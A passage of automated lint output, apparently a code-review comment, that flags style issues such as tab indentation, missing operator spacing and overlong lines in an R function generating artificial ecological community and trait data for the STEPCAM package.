1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, 